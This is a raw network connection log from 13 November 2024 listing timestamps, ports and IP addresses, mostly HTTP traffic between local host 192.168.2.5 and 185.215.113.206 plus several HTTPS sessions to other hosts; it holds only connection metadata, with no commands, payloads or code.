Nov 13, 2024 20:39:51.148078918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148085117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148097038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148098946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148108006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148121119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148121119 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148134947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148140907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148148060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148159027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148160934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148174047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148179054 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148197889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148224115 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.151916981 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.171845913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171868086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171878099 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171912909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171924114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171933889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.171945095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.172033072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.172033072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.172034025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.172034025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.188246965 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.188344002 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.188431025 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.189142942 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.189187050 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.191214085 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.191267967 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.191411972 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.191603899 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.191641092 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.212671041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.212748051 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.213076115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.213136911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.215399027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.215451002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.215461016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.215466022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.215519905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.215636969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.215683937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.241024017 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.241417885 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.241436958 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.243501902 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.243577003 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.244714022 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.244797945 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.244895935 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.257769108 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.263391972 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263410091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263422966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263494015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263504982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263519049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263528109 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263539076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263550043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263561010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263573885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263583899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263585091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263585091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263585091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263678074 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263758898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263770103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263787985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263799906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263809919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.263818026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.263875961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264055967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264069080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264113903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264141083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264200926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264211893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264231920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264245033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264256001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264256001 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264256954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264290094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264290094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264473915 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264483929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264493942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264508963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264519930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264519930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264530897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264542103 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264543056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264556885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264565945 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264569044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264585018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264607906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264638901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264650106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264662027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264688969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264688969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264718056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264806986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264817953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264862061 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.264949083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264959097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264969110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264980078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.264990091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265006065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265010118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265010118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265017986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265029907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265033960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265042067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265053988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265080929 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265080929 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265109062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265399933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265412092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265424967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265444040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265450954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265450954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265455008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265466928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265479088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265480995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265480995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265490055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.265506983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.265530109 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.268594980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.268610954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.268621922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.268721104 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.279637098 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.279719114 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.282006979 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.282038927 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.287333965 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.288790941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.288863897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.289107084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289166927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.289503098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289522886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289535046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289546013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289556026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.289557934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.289578915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.289623976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.296250105 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.296276093 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:51.303392887 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.303651094 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.303714037 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.305205107 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.305290937 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.306374073 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.306468010 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.306693077 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.306710958 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.314188957 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.314512968 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.314577103 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.315489054 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.315674067 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.315737009 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316122055 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316292048 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.316312075 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316520929 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316692114 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316813946 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.316876888 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.316903114 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.317050934 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.317064047 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.317066908 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.317188978 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.317205906 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.317646027 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.317724943 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.317763090 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.317831993 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.317991018 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.318084002 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318264961 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.318346024 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318412066 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.318428040 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318458080 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.318470001 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318476915 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318623066 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.318629026 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.318696976 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.319061041 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.319143057 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.319175005 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.319258928 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.319354057 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.319361925 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.319395065 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.319408894 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.329236984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.329533100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.329847097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.329910040 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.332685947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.332700968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.332719088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.332757950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.332792044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.335776091 CET	443	49955	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.336481094 CET	49955	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.336525917 CET	443	49955	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.337313890 CET	49955	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.337327003 CET	443	49955	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.339915991 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:51.344028950 CET	443	49953	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.344589949 CET	49953	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.344616890 CET	443	49953	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.345321894 CET	49953	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.345334053 CET	443	49953	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.351972103 CET	443	49952	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.352612972 CET	49952	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.352698088 CET	443	49952	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.353121996 CET	49952	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.353136063 CET	443	49952	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.354382992 CET	443	49954	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.354891062 CET	49954	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.354923010 CET	443	49954	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.355062962 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.356686115 CET	49954	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:51.356697083 CET	443	49954	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:51.359349012 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.361489058 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.370357990 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.370357990 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.370412111 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.380471945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380497932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380511999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380532026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380543947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380554914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380568981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380563021 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380563974 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380578995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380635977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380640984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380640984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380640984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380649090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380662918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380692959 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380692959 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380713940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.380959034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380969048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380981922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.380995035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381006956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381030083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381071091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381083965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381097078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381108999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381122112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381130934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381135941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381150007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381151915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381162882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381175041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381179094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381191015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381202936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381205082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381217003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381222963 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381231070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381256104 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381273031 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381405115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381417036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381428957 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381441116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381452084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381453037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381478071 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381511927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381522894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381535053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381546974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381580114 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381612062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381684065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381695986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381707907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381726027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381733894 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381741047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381755114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381757975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381767988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381786108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381788969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381798983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381812096 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381813049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381828070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381831884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381858110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381877899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.381951094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381963015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381974936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.381988049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.382004976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.382036924 CET	49873	80	192.168.2.5	185.215.113.206
